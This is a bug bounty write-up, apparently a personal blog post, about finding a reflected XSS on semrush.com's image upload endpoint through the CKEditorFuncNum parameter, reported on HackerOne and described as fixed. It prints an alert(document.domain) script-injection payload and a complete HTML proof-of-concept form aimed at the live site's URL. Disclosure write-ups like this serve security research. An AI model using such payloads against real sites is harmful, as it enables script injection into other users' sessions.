Recently, I’ve found something new for me , and I found this on www.semrush.com some bug bounty program on hackerone . And it’s first time I’ve found XSS on hackerone program. So, This is the story.
While I’am looking around on semrush.com , try to one page and another page, put some payload on all field, and end on page https://www.semrush.com/my-posts/ this page is can be post something, and you able write everything you want. I try to put some xss payload on the field , but nothing happen.
Then, I try to upload some image, And the interesting time begin. I try to upload malicious filename on that page. It’s looks like this.
I take a long time to analyzing the request and response when I upload some image, but after a cup of coffee, help me to focus, and I notice the parameter
CKEditorFuncNum on request is reflected on response. I try to write some text and see the result, is reflect on response
After know is reflected , I use payload XSS to trigger the XSS with payload like this :
</script><script>alert(document.domain)</script> and it’s execute as script!.
After know this, I made simple HTML to execute this, and the code is like this :
<html> <body> <form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html>
And whenever user click Submit Request, The XSS will be fired UP!
This is mark as valid from semrush security team. It’s has been fixed very well. More Experience I Get.
You can visit on hackerone report : https://hackerone.com/reports/375352